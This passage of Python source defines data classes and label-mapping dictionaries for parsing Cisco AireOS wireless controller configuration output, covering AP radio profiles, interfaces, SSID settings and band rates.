def __str__(self):\n return 'Nearby AP info for ' + self.name\n\n def __repr__(self):\n return 'Nearby AP info for ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Nearby_Aps(NamedList): # This class is important to add name attribute of AP that heard this list of APs\n def __init__(self, list_name, item_name):\n self.objname = 'Nearby_Aps'\n self.item_name = 'Nearby_Ap'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.ap_name = None # Name of AP that heard these nearby APs\n self.ap_slot = None # Slot ID of AP that heard these nearby APs\n\n def get_one_item(self):\n return Nearby_Ap()\n\n def update_name(self):\n if self.ap_name is not None:\n self.name = self.ap_name + '_slot' + self.ap_slot\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Rf_Config(): # Item for NamedList \"AP RF Configs\" - subclass of wlc_config\n def __init__(self):\n self.objname = 'AP RF config'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.number_of_slots = None\n self.ap_name = None\n self.mac_address = None\n self.slot_id = None\n self.radio_type = None\n self.sub_band_type = None\n self.nearby_aps = Nearby_Aps('Nearby_Aps', 'Nearby_Ap')\n self.noise_profile = None\n self.noise_profile_channel_1 = None\n self.noise_profile_channel_2 = None\n self.noise_profile_channel_3 = None\n self.noise_profile_channel_4 = None\n self.noise_profile_channel_5 = None\n self.noise_profile_channel_6 = None\n self.noise_profile_channel_7 = None\n self.noise_profile_channel_8 = None\n 
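# This noise/interference/rogue block enumerates the 2.4 GHz channels 1-14 and the\n        # 5 GHz channels 34-173; presumably only the slots matching this radio's band get\n        # populated during parsing.\n        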
self.noise_profile_channel_9 = None\n self.noise_profile_channel_10 = None\n self.noise_profile_channel_11 = None\n self.noise_profile_channel_12 = None\n self.noise_profile_channel_13 = None\n self.noise_profile_channel_14 = None\n self.noise_profile_channel_34 = None\n self.noise_profile_channel_36 = None\n self.noise_profile_channel_38 = None\n self.noise_profile_channel_40 = None\n self.noise_profile_channel_42 = None\n self.noise_profile_channel_44 = None\n self.noise_profile_channel_46 = None\n self.noise_profile_channel_48 = None\n self.noise_profile_channel_52 = None\n self.noise_profile_channel_56 = None\n self.noise_profile_channel_60 = None\n self.noise_profile_channel_64 = None\n self.noise_profile_channel_100 = None\n self.noise_profile_channel_104 = None\n self.noise_profile_channel_108 = None\n self.noise_profile_channel_112 = None\n self.noise_profile_channel_116 = None\n self.noise_profile_channel_120 = None\n self.noise_profile_channel_124 = None\n self.noise_profile_channel_128 = None\n self.noise_profile_channel_132 = None\n self.noise_profile_channel_136 = None\n self.noise_profile_channel_140 = None\n self.noise_profile_channel_144 = None\n self.noise_profile_channel_149 = None\n self.noise_profile_channel_153 = None\n self.noise_profile_channel_157 = None\n self.noise_profile_channel_161 = None\n self.noise_profile_channel_165 = None\n self.noise_profile_channel_169 = None\n self.noise_profile_channel_173 = None\n self.interference_profile = None\n self.interference_profile_channel_1 = None\n self.interference_profile_channel_2 = None\n self.interference_profile_channel_3 = None\n self.interference_profile_channel_4 = None\n self.interference_profile_channel_5 = None\n self.interference_profile_channel_6 = None\n self.interference_profile_channel_7 = None\n self.interference_profile_channel_8 = None\n self.interference_profile_channel_9 = None\n self.interference_profile_channel_10 = None\n self.interference_profile_channel_11 = None\n self.interference_profile_channel_12 = None\n self.interference_profile_channel_13 = None\n self.interference_profile_channel_14 = None\n self.interference_profile_channel_34 = None\n self.interference_profile_channel_36 = None\n self.interference_profile_channel_38 = None\n self.interference_profile_channel_40 = None\n self.interference_profile_channel_42 = None\n self.interference_profile_channel_44 = None\n self.interference_profile_channel_46 = None\n self.interference_profile_channel_48 = None\n self.interference_profile_channel_52 = None\n self.interference_profile_channel_56 = None\n self.interference_profile_channel_60 = None\n self.interference_profile_channel_64 = None\n self.interference_profile_channel_100 = None\n self.interference_profile_channel_104 = None\n self.interference_profile_channel_108 = None\n self.interference_profile_channel_112 = None\n self.interference_profile_channel_116 = None\n self.interference_profile_channel_120 = None\n self.interference_profile_channel_124 = None\n self.interference_profile_channel_128 = None\n self.interference_profile_channel_132 = None\n self.interference_profile_channel_136 = None\n self.interference_profile_channel_140 = None\n self.interference_profile_channel_144 = None\n self.interference_profile_channel_149 = None\n self.interference_profile_channel_153 = None\n self.interference_profile_channel_157 = None\n self.interference_profile_channel_161 = None\n self.interference_profile_channel_165 = None\n self.interference_profile_channel_169 = None\n 
self.interference_profile_channel_173 = None\n self.rogue_histogram = None\n self.rogue_histogram_channel_1 = None\n self.rogue_histogram_channel_2 = None\n self.rogue_histogram_channel_3 = None\n self.rogue_histogram_channel_4 = None\n self.rogue_histogram_channel_5 = None\n self.rogue_histogram_channel_6 = None\n self.rogue_histogram_channel_7 = None\n self.rogue_histogram_channel_8 = None\n self.rogue_histogram_channel_9 = None\n self.rogue_histogram_channel_10 = None\n self.rogue_histogram_channel_11 = None\n self.rogue_histogram_channel_12 = None\n self.rogue_histogram_channel_13 = None\n self.rogue_histogram_channel_14 = None\n self.rogue_histogram_channel_34 = None\n self.rogue_histogram_channel_36 = None\n self.rogue_histogram_channel_38 = None\n self.rogue_histogram_channel_40 = None\n self.rogue_histogram_channel_42 = None\n self.rogue_histogram_channel_44 = None\n self.rogue_histogram_channel_46 = None\n self.rogue_histogram_channel_48 = None\n self.rogue_histogram_channel_52 = None\n self.rogue_histogram_channel_56 = None\n self.rogue_histogram_channel_60 = None\n self.rogue_histogram_channel_64 = None\n self.rogue_histogram_channel_100 = None\n self.rogue_histogram_channel_104 = None\n self.rogue_histogram_channel_108 = None\n self.rogue_histogram_channel_112 = None\n self.rogue_histogram_channel_116 = None\n self.rogue_histogram_channel_120 = None\n self.rogue_histogram_channel_124 = None\n self.rogue_histogram_channel_128 = None\n self.rogue_histogram_channel_132 = None\n self.rogue_histogram_channel_136 = None\n self.rogue_histogram_channel_140 = None\n self.rogue_histogram_channel_144 = None\n self.rogue_histogram_channel_149 = None\n self.rogue_histogram_channel_153 = None\n self.rogue_histogram_channel_157 = None\n self.rogue_histogram_channel_161 = None\n self.rogue_histogram_channel_165 = None\n self.rogue_histogram_channel_169 = None\n self.rogue_histogram_channel_173 = None\n self.load_profile = None\n self.load_profile_receive_utilization = None\n self.load_profile_transmit_utilization = None\n self.load_profile_channel_utilization = None\n self.load_profile_attached_clients = None\n self.coverage_profile = None\n self.failed_clients = None\n self.client_signal_strengths = None\n self.client_signal_strengths_rssi_100_dbm = None\n self.client_signal_strengths_rssi_92_dbm = None\n self.client_signal_strengths_rssi_84_dbm = None\n self.client_signal_strengths_rssi_76_dbm = None\n self.client_signal_strengths_rssi_68_dbm = None\n self.client_signal_strengths_rssi_60_dbm = None\n self.client_signal_strengths_rssi_52_dbm = None\n self.client_signal_to_noise_ratios = None\n self.client_signal_to_noise_ratios_snr_0_db = None\n self.client_signal_to_noise_ratios_snr_5_db = None\n self.client_signal_to_noise_ratios_snr_10_db = None\n self.client_signal_to_noise_ratios_snr_15_db = None\n self.client_signal_to_noise_ratios_snr_20_db = None\n self.client_signal_to_noise_ratios_snr_25_db = None\n self.client_signal_to_noise_ratios_snr_30_db = None\n self.client_signal_to_noise_ratios_snr_35_db = None\n self.client_signal_to_noise_ratios_snr_40_db = None\n self.client_signal_to_noise_ratios_snr_45_db = None\n self.radar_information = None\n self.channel_assignment_information = None\n self.channel_assignment_information_current_channel_average_energy = None\n self.channel_assignment_information_previous_channel_average_energy = None\n self.channel_assignment_information_channel_change_count = None\n self.channel_assignment_information_last_channel_change_time = None\n 
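# The RRM channel-assignment history and RF parameter recommendations below close\n        # out the per-radio record, which update_name() keys as '<ap_name>_slot<slot_id>'.\n        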
self.channel_assignment_information_recommended_best_channel = None\n        self.rf_parameter_recommendations = None\n        self.rf_parameter_recommendations_power_level = None\n        self.rf_parameter_recommendations_rts_cts_threshold = None\n        self.rf_parameter_recommendations_fragmentation_threshold = None\n        self.rf_parameter_recommendations_antenna_pattern = None\n\n    def __str__(self):\n        return 'AP RF config ' + self.name\n\n    def __repr__(self):\n        return 'AP RF config ' + self.name\n\n    def update_name(self):\n        if self.ap_name is not None and self.slot_id is not None:\n            self.name = self.ap_name + '_slot' + self.slot_id\n\n    def show(self):\n        show(self)\n\n    def grep(self, keyword):\n        grep(self, keyword)\n\n\n
class Dynamic_Interface(): # Item for NamedList \"dynamic interface\" - subclass of wlc_config\n    def __init__(self, name=None):\n        self.objname = 'Dynamic Interface'\n        self.name = None\n        self.type = 'mixed' # defines if class contain operational or config data\n        self.interface_configuration = None\n        self.interface_name = None\n        self.mac_address = None\n        self.ip_address = None\n        self.ip_netmask = None\n        self.ip_gateway = None\n        self.external_nat_ip_state = None\n        self.external_nat_ip_address = None\n        self.link_local_ipv6_address = None\n        self.state_link_local_ipv6 = None\n        self.ipv6_address = None\n        self.state_ipv6 = None\n        self.ipv6_gateway = None\n        self.ipv6_gateway_mac_address = None\n        self.state_ipv6_gateway = None\n        self.nas_identifier = None\n        self.vlan = None\n        self.quarantine_vlan = None\n        self.active_physical_port = None\n        self.primary_physical_port = None\n        self.backup_physical_port = None\n        self.dhcp_proxy_mode = None\n        self.primary_dhcp_server = None\n        self.secondary_dhcp_server = None\n        self.dhcp_option_82 = None\n        self.dhcp_option_82_bridge_mode_insertion = None\n        self.ipv4_acl = None\n        self.url_acl = None\n        self.ipv6_acl = None\n        self.url_acl1 = None\n        self.mdns_profile_name = None\n        self.ap_manager = None\n        self.guest_interface = None\n        self.d_3g_vlan = None\n        self.l2_multicast = None\n        self.slaac = None\n        self.dhcp_protocol = None\n        self.speed = None\n        self.duplex = None\n        self.auto_negotiation = None\n        self.link_status = None\n        self.virtual_dns_host_name = None\n        self.remote_id_format = None\n        self.link_select_suboption = None\n        self.relay_src_intf = None\n        self.vpn_select_suboption = None\n\n    def __str__(self):\n        return 'Dynamic interface ' + self.name\n\n    def __repr__(self):\n        return 'Dynamic interface ' + self.name\n\n    def update_name(self):\n        self.name = self.interface_name\n\n    def show(self):\n        show(self)\n\n    def grep(self, keyword):\n        grep(self, keyword)\n\n\n
class Interface_Group(): # Item for NamedList \"interface groups\" - subclass of wlc_config\n    def __init__(self, name=None):\n        self.objname = 'Interface Group'\n        self.name = None\n        self.type = 'config' # defines if class contain operational or config data\n        self.interface_group_name = None\n        self.quarantine = None\n        self.number_of_wlans_using_the_interface_group = None\n        self.number_of_ap_groups_using_the_interface_group = None\n        self.number_of_interfaces_contained = None\n        self.mdns_profile_name = None\n        self.failure_detect_mode = None\n        self.interface_group_description = None\n        self.interfaces = None\n\n    def __str__(self):\n        return 'Interface group ' + self.interface_group_name\n\n    def __repr__(self):\n        return 'Interface group ' + self.interface_group_name\n\n    def update_name(self):\n        self.name = self.interface_group_name\n\n    def show(self):\n        show(self)\n\n    def grep(self, keyword):\n        grep(self, keyword)\n\n\n
class Ssid_Config(): # Item for NamedList \"WLANs\" - subclass of wlc_config\n    def __init__(self):\n        self.objname = 'SSID config'\n        self.name = None\n        self.type = 'config' # defines if class contain operational or config data\n        self.wlan_identifier = None\n        self.profile_name = None\n        self.network_name_ssid = None\n        self.status = None\n        self.mac_filtering = None\n        self.broadcast_ssid = None\n        self.aaa_policy_override = None\n        self.network_admission_control = None\n        self.client_profiling_status = None\n        self.client_profiling_status_radius_profiling = None\n        self.client_profiling_status_radius_profiling_dhcp = None\n        self.client_profiling_status_radius_profiling_http = None\n        self.client_profiling_status_local_profiling = None\n        self.client_profiling_status_local_profiling_dhcp = None\n        self.client_profiling_status_local_profiling_http = None\n        self.radius_nac_state = None\n        self.snmp_nac_state = None\n        self.quarantine_vlan = None\n        self.maximum_clients_allowed = None\n        self.security_group_tag = None\n        self.maximum_number_of_clients_per_ap_radio = None\n        self.atf_policy = None\n        self.number_of_active_clients = None\n        self.exclusionlist = None\n        self.exclusionlist_timeout = None\n        self.session_timeout = None\n        self.user_idle_timeout = None\n        self.sleep_client = None\n        self.sleep_client_timeout = None\n        self.web_auth_captive_bypass_mode = None\n        self.user_idle_threshold = None\n        self.nas_identifier = None\n        self.chd_per_wlan = None\n        self.webauth_dhcp_exclusion = None\n        self.interface = None\n        self.multicast_interface = None\n        self.wlan_ipv4_acl = None\n        self.wlan_ipv6_acl = None\n        self.wlan_layer2_acl = None\n        self.wlan_url_acl = None\n        self.mdns_status = None\n        self.mdns_profile_name = None\n        self.dhcp_server = None\n        self.central_nat_peer_peer_blocking = None\n        self.dhcp_address_assignment_required = None\n        self.static_ip_client_tunneling = None\n        self.tunnel_profile = None\n        self.pmipv6_mobility_type = None\n        self.pmipv6_mobility_type_pmipv6_mag_profile = None\n        self.pmipv6_mobility_type_pmipv6_default_realm = None\n        self.pmipv6_mobility_type_pmipv6_nai_type = None\n        self.pmipv6_mobility_type_pmipv6_mag_location = None\n        self.quality_of_service = None\n        self.per_ssid_rate_limits = None\n        self.average_data_rate = None\n        self.average_realtime_data_rate = None\n        self.burst_data_rate = None\n        self.burst_realtime_data_rate = None\n        self.per_client_rate_limits = None\n        # NOTE: the per-client section repeats the same four rate fields; in this\n        # version they share the attribute names declared above under\n        # per_ssid_rate_limits.\n        self.scan_defer_priority = None\n        self.scan_defer_time = None\n        self.wmm = None\n        self.wmm_uapsd_compliant_client_support = None\n        self.media_stream_multicast_direct = None\n        self.ccx_aironetie_support = None\n        self.ccx_gratuitous_proberesponse_gpr = None\n        self.ccx_diagnostics_channel_capability = None\n        self.dot11_phone_mode_7920 = None\n        self.wired_protocol = None\n        self.passive_client_feature = None\n        self.peer_to_peer_blocking_action = None\n        self.radio_policy = None\n        self.dtim_period_for_802_11a_radio = None\n        self.dtim_period_for_802_11b_radio = None\n        self.radius_servers = None\n        self.radius_servers_authentication = None\n        self.radius_servers_accounting = None\n        self.radius_servers_accounting_interim_update = None\n        self.radius_servers_accounting_interim_update_interval = None\n        self.radius_servers_accounting_framed_ipv6_acct_avp = None\n        self.radius_servers_dynamic_interface = None\n        self.radius_servers_dynamic_interface_priority = None\n        self.local_eap_authentication 
= None\n self.radius_nai_realm = None\n self.mu_mimo = None\n self.security = None\n self.security_802_11_authentication = None\n self.security_ft_support = None\n self.security_static_wep_keys = None\n self.security_802_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2 = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa_ssn_ie = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_tkip_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_aes_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_ccmp256_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_gcmp128_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_gcmp256_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_osen_ie = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_802_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_psk = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_cckm = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_ft_1x802_11r = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_ft_psk802_11r = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_pmf_1x802_11w = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_pmf_psk802_11w = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_osen_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_suiteb_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_suiteb192_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2_ft_reassociation_timeout = None\n self.security_wi_fi_protected_access_wpa_wpa2_ft_over_the_ds_mode = None\n self.security_wi_fi_protected_access_wpa_wpa2_gtk_randomization = None\n self.security_wi_fi_protected_access_wpa_wpa2_skc_cache_support = None\n self.security_wi_fi_protected_access_wpa_wpa2_cckm_tsf_tolerance = None\n self.security_wi_fi_direct_policy_configured = None\n self.security_eap_passthrough = None\n self.security_ckip = None\n self.security_web_based_authentication = None\n self.security_web_authentication_timeout = None\n self.security_web_passthrough = None\n self.security_mac_auth_server = None\n self.security_web_portal_server = None\n self.security_qrscan_des_key = None\n self.security_conditional_web_redirect = None\n self.security_splash_page_web_redirect = None\n self.security_auto_anchor = None\n self.security_flexconnect_local_switching = None\n self.security_flexconnect_central_association = None\n self.security_flexconnect_central_dhcp_flag = None\n self.security_flexconnect_nat_pat_flag = None\n self.security_flexconnect_dns_override_flag = None\n self.security_flexconnect_pppoe_pass_through = None\n self.security_flexconnect_local_switching_ip_source_guar = None\n self.security_flexconnect_vlan_based_central_switching = None\n self.security_flexconnect_local_authentication = None\n self.security_flexconnect_learn_ip_address = None\n self.security_client_mfp = None\n self.security_pmf = None\n self.security_pmf_association_comeback_time = None\n self.security_pmf_sa_query_retrytimeout = None\n self.security_tkip_mic_countermeasure_hold_down_timer = None\n self.security_eap_params = None\n self.avc_visibility = None\n 
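# The security_* attributes above flatten the nested 'Security' section of the\n        # per-WLAN controller output, one attribute per printed line.\n        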
self.avc_profile_name = None\n self.flex_avc_profile_name = None\n self.opendns_profile_name = None\n self.opendns_wlan_mode = None\n self.flow_monitor_name = None\n self.split_tunnel_configuration = None\n self.split_tunnel_configuration_split_tunnel = None\n self.call_snooping = None\n self.roamed_call_re_anchor_policy = None\n self.sip_cac_fail_send_486_busy_policy = None\n self.sip_cac_fail_send_dis_association_policy = None\n self.kts_based_cac_policy = None\n self.assisted_roaming_prediction_optimization = None\n self.d_802_11k_neighbor_list = None\n self.d_802_11k_neighbor_list_dual_band = None\n self.d_802_11v_directed_multicast_service = None\n self.d_802_11v_bss_max_idle_service = None\n self.d_802_11v_bss_transition_service = None\n self.d_802_11v_bss_transition_disassoc_imminent = None\n self.d_802_11v_bss_transition_disassoc_timer = None\n self.d_802_11v_bss_transition_oproam_disassoc_timer = None\n self.dms_db_is_empty = None\n self.band_select = None\n self.load_balancing = None\n self.multicast_buffer = None\n self.universal_ap_admin = None\n self.broadcast_tagging = None\n self.prp = None\n self.mobility_anchor_list = None\n self.d_802_11u = None\n self.msap_services = None\n self.local_policy = None\n self.priority__policy_name = None\n self.lync_state = None\n self.audio_qos_policy = None\n self.video_qos_policy = None\n self.app_share_qos_policy = None\n self.file_transfer_qos_policy = None\n self.qos_fastlane_status = None\n self.selective_reanchoring_status = None\n self.lobby_admin_access = None\n self.fabric_status = None\n self.vnid_name = None\n self.vnid = None\n self.applied_sgt_tag = None\n self.peer_ip_address = None\n self.flex_acl_name = None\n self.flex_avc_policy_name = None\n self.u3_interface = None\n self.u3_reporting_interval = None\n\n def update_name(self):\n self.name = self.network_name_ssid\n\n def __str__(self):\n return 'SSID config ' + self.name\n\n def __repr__(self):\n return 'SSID config ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Wlc_Config():\n def __init__(self, hostname=None, parsing_date=None, software_version=None, collection_time='None'):\n self.__wlc_config_version__ = '0.2.0'\n self.__parser_version__ = '0.81'\n self.software_version = software_version\n self.objname = 'WLC AireOS config'\n self.platform = None #9800\\AireOS\n self.type = 'mixed' # defines if class contain operational or config data\n self.name = None # hostname?\n self.parsing_date = parsing_date\n self.collection_time = collection_time\n self.hostname = hostname\n self.dhcp_proxy = None\n self.dynamic_interfaces = NamedList('Dynamic Interfaces',\n 'Dynamic_Interface') # item type should be Dynamic Interface\n self.interface_group = NamedList('Interface Groups', 'Interface_Group')\n self.ssid = NamedList('SSIDs', 'Ssid_Config') # item type should be Ssid_Config\n self.ap_rf = NamedList('AP RF Configs', 'Ap_Rf_Config') # item type should be Ap_Rf_Config\n self.rogue_aps = NamedList('Rogue APs', 'Rogue_AP')\n self.ports = NamedList('Ports', 'Port')\n self.mobility_group_members = NamedList('Mobility group members', 'Mobility group member')\n self.radius_authentication_servers = NamedList('Radius authentication servers', 'Radius authentication server')\n self.radius_accounting_servers = NamedList('Radius accounting servers', 'Radius accounting server')\n self.ap_configs = NamedList('AP Configs', 'Ap_Config')\n self.dhcp_servers = NamedList('DHCP servers', 'Dhcp_Server')\n self.rf_profiles = NamedList('RF 
profiles', 'Rf_Profile')\n self.ap_groups = NamedList('AP Groups', 'Ap_Group')\n self.radius_config = Radius_Config()\n self.switch = Switch_Config()\n self.network = Network_Config()\n self.advanced = Advanced_Config()\n self.redundancy = Redundancy_Config()\n self.mobility_config = Mobility_Config()\n self.system = System_Config()\n self.band5 = Band5_Config()\n self.band24 = Band24_Config()\n self.cleanair_24 = Cleanair_24G_Config()\n self.cleanair_5 = Cleanair_5G_Config()\n self.ipv6 = Ipv6_Config()\n\n def add_subclass(self, object):\n if isinstance(object, NamedList): # For Named LIST objects\n if object.item_name == 'Ssid_Config': self.ssid = object\n if object.item_name == 'Dynamic_Interface': self.dynamic_interfaces = object\n if object.item_name == 'Interface_Group': self.interface_group = object\n if object.item_name == 'Ap_Rf_Config': self.ap_rf = object\n if object.item_name == 'Rogue_AP': self.rogue_aps = object\n if object.item_name == 'Port': self.ports = object\n if object.item_name == 'Radius authentication server': self.radius_authentication_servers = object\n if object.item_name == 'Radius accounting server': self.radius_accounting_servers = object\n if object.item_name == 'Mobility group member': self.mobility_group_members = object\n if object.item_name == 'Rf_Profile': self.rf_profiles = object\n if object.item_name == 'Ap_Config': self.ap_configs = object # Check item name here self.ap_configs = NamedList('AP Configs', 'Ap_Config')\n if object.item_name == 'Dhcp_Server': self.dhcp_servers = object\n if object.item_name == 'Ap_Group': self.ap_groups = object\n if object.item_name == 'Nearby_Ap':\n self.ap_rf[object.name].nearby_aps = object\n else: ##For NON - Named List objects\n if isinstance(object, Switch_Config): self.switch = object\n if isinstance(object, Ipv6_Config): self.ipv6 = object\n if isinstance(object, Radius_Config): self.radius_config = object\n if isinstance(object, Network_Config): self.network = object\n if isinstance(object, Redundancy_Config): self.redundancy = object\n if isinstance(object, System_Config): self.system = object\n if isinstance(object, Advanced_Config): self.advanced = object\n if isinstance(object, Band5_Config): self.band5 = object\n if isinstance(object, Band24_Config): self.band24 = object\n if isinstance(object, Cleanair_24G_Config): self.cleanair_24 = object\n if isinstance(object, Cleanair_5G_Config): self.cleanair_5 = object\n if isinstance(object, Mobility_Config): self.mobility_config = object\n\n def __str__(self):\n return 'WLC config for host: ' + self.hostname + ', platform: ' + self.platform + ', version is ' + self.software_version + ', collection time is ' + self.collection_time + ', parsing date is ' + self.parsing_date\n\n def __repr__(self):\n return 'WLC config for host: ' + self.hostname + ', platform: ' + self.platform + ', version is ' + self.software_version + ', collection time is ' + self.collection_time + ', parsing date is ' + self.parsing_date\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n# AireOS PARSING DICTIONARIES SECTION\n\nadvanced_config_parsing_dict = {\n 'Probe request filtering': 'probe_request_filtering',\n 'Probes fwd to controller per client per radio': 'probes_fwd_to_controller_per_client_per_radio',\n 'Probe request rate-limiting interval': 'probe_request_rate_limiting_interval',\n 'Aggregate Probe request interval': 'aggregate_probe_request_interval',\n 'Increased backoff parameters for probe respon': 
'increased_backoff_parameters_for_probe',\n 'EAP-Identity-Request Timeout (seconds)': 'eap_identity_request_timeout_seconds',\n 'EAP-Identity-Request Max Retries': 'eap_identity_request_max_retries',\n 'EAP Key-Index for Dynamic WEP': 'eap_key_index_for_dynamic_wep',\n 'EAP Max-Login Ignore Identity Response': 'eap_max_login_ignore_identity_response',\n 'EAP-Request Timeout (seconds)': 'eap_request_timeout_seconds',\n 'EAP-Request Max Retries': 'eap_request_max_retries',\n 'EAPOL-Key Timeout (milliseconds)': 'eapol_key_timeout_milliseconds',\n 'EAPOL-Key Max Retries': 'eapol_key_max_retries',\n 'EAP-Broadcast Key Interval': 'eap_broadcast_key_interval',\n 'Fastpath Packet Capture': 'fastpath_packet_capture',\n 'Fastpath Fast Cache Control': 'fastpath_fast_cache_control',\n 'Fastpath Fast Testmode': 'fastpath_fast_testmode',\n 'dot11-padding': 'dot11_padding',\n 'padding-size': 'padding_size',\n 'Advanced Hotspot Commands': 'advanced_hotspot_commands',\n 'ANQP 4-way state': 'anqp_4_way_state',\n 'GARP Broadcast state:': 'garp_broadcast_state',\n 'GAS request rate limit': 'gas_request_rate_limit',\n 'ANQP comeback delay in TUs(TU=1024usec)': 'anqp_comeback_delay',\n}\n\nipv6_config_parsing_dict = {\n 'Global Config': 'global_config',\n 'Reachable-lifetime value': 'reachable_lifetime_value',\n 'Stale-lifetime value': 'stale_lifetime_value',\n 'Down-lifetime value': 'down_lifetime_value',\n 'RA Throttling': 'ra_throttling',\n 'RA Throttling allow at-least': 'ra_throttling_allow_at_least',\n 'RA Throttling allow at-most': 'ra_throttling_allow_at_most',\n 'RA Throttling max-through': 'ra_throttling_max_through',\n 'RA Throttling throttle-period': 'ra_throttling_throttle_period',\n 'RA Throttling interval-option': 'ra_throttling_interval_option',\n 'NS Mulitcast CacheMiss Forwarding': 'ns_mulitcast_cachemiss_forwarding',\n 'NA Mulitcast Forwarding': 'na_mulitcast_forwarding',\n 'IPv6 Capwap UDP Lite': 'ipv6_capwap_udp_lite',\n 'Operating System IPv6 state': 'operating_system_ipv6_state',\n}\n\nradius_config_parsing_dict = {\n 'Vendor Id Backward Compatibility': 'vendor_id_backward_compatibility',\n 'Call Station Id Case': 'call_station_id_case',\n 'Accounting Call Station Id Type': 'accounting_call_station_id_type',\n 'Auth Call Station Id Type': 'auth_call_station_id_type',\n 'Extended Source Ports Support': 'extended_source_ports_support',\n 'Aggressive Failover': 'aggressive_failover',\n 'Keywrap': 'keywrap',\n 'Fallback Test:': 'fallback_test',\n 'Test Mode': 'fallback_test_test_mode',\n 'Probe User Name': 'fallback_test_probe_user_name',\n 'Interval (in seconds)': 'fallback_test_interval_in_seconds',\n 'MAC Delimiter for Authentication Messages': 'mac_delimiter_for_authentication_messages',\n 'MAC Delimiter for Accounting Messages': 'mac_delimiter_for_accounting_messages',\n 'RADIUS Authentication Framed-MTU': 'radius_authentication_framed_mtu',\n}\n\nap_group_parsing_dict = {\n 'Site Name': 'site_name',\n 'Site Description': 'site_description',\n 'Venue Group Code': 'venue_group_code',\n 'Venue Type Code': 'venue_type_code',\n 'NAS-identifier': 'nas_identifier',\n 'Client Traffic QinQ Enable': 'client_traffic_qinq_enable',\n 'DHCPv4 QinQ Enable': 'dhcpv4_qinq_enable',\n 'AP Operating Class': 'ap_operating_class',\n 'Capwap Prefer Mode': 'capwap_prefer_mode',\n 'Antenna Monitoring - Status': 'antenna_monitoring_status',\n '2.4 GHz band': 'rf_profile_24',\n '5 GHz band': 'rf_profile_5',\n 'Fabric Flex Acl Template Name': 'fabric_flex_acl_template_name',\n}\nband_24_parsing_dict = {\n '802.11b 
Network': 'd_802_11b_network',\n '11gSupport': 'd_11gsupport',\n '11nSupport': 'd_11nsupport',\n '802.11b/g Operational Rates': 'd_802_11b_g_operational_rates',\n '802.11b 1M Rate': 'd_802_11b_g_operational_rates_802_11b_g_1m_rate',\n '802.11b 2M Rate': 'd_802_11b_g_operational_rates_802_11b_g_2m_rate',\n '802.11b 5.5M Rate': 'd_802_11b_g_operational_rates_802_11b_g_5_5m_rate',\n '802.11b 11M Rate': 'd_802_11b_g_operational_rates_802_11b_g_11m_rate',\n '802.11b/g 1M Rate': 'd_802_11b_g_operational_rates_802_11b_g_1m_rate',\n '802.11b/g 2M Rate': 'd_802_11b_g_operational_rates_802_11b_g_2m_rate',\n '802.11b/g 5.5M Rate': 'd_802_11b_g_operational_rates_802_11b_g_5_5m_rate',\n '802.11b/g 11M Rate': 'd_802_11b_g_operational_rates_802_11b_g_11m_rate',\n '802.11g 6M Rate': 'd_802_11b_g_operational_rates_802_11g_6m_rate',\n '802.11g 9M Rate': 'd_802_11b_g_operational_rates_802_11g_9m_rate',\n '802.11g 12M Rate': 'd_802_11b_g_operational_rates_802_11g_12m_rate',\n '802.11g 18M Rate': 'd_802_11b_g_operational_rates_802_11g_18m_rate',\n '802.11g 24M Rate': 'd_802_11b_g_operational_rates_802_11g_24m_rate',\n '802.11g 36M Rate': 'd_802_11b_g_operational_rates_802_11g_36m_rate',\n '802.11g 48M Rate': 'd_802_11b_g_operational_rates_802_11g_48m_rate',\n '802.11g 54M Rate': 'd_802_11b_g_operational_rates_802_11g_54m_rate',\n '802.11n MCS Settings:': 'd_802_11n_mcs_settings',\n 'MCS 0': 'd_802_11n_mcs_settings_mcs_0',\n 'MCS 1': 'd_802_11n_mcs_settings_mcs_1',\n 'MCS 2': 'd_802_11n_mcs_settings_mcs_2',\n 'MCS 3': 'd_802_11n_mcs_settings_mcs_3',\n 'MCS 4': 'd_802_11n_mcs_settings_mcs_4',\n 'MCS 5': 'd_802_11n_mcs_settings_mcs_5',\n 'MCS 6': 'd_802_11n_mcs_settings_mcs_6',\n 'MCS 7': 'd_802_11n_mcs_settings_mcs_7',\n 'MCS 8': 'd_802_11n_mcs_settings_mcs_8',\n 'MCS 9': 'd_802_11n_mcs_settings_mcs_9',\n 'MCS 10': 'd_802_11n_mcs_settings_mcs_10',\n 'MCS 11': 'd_802_11n_mcs_settings_mcs_11',\n 'MCS 12': 'd_802_11n_mcs_settings_mcs_12',\n 'MCS 13': 'd_802_11n_mcs_settings_mcs_13',\n 'MCS 14': 'd_802_11n_mcs_settings_mcs_14',\n 'MCS 15': 'd_802_11n_mcs_settings_mcs_15',\n 'MCS 16': 'd_802_11n_mcs_settings_mcs_16',\n 'MCS 17': 'd_802_11n_mcs_settings_mcs_17',\n 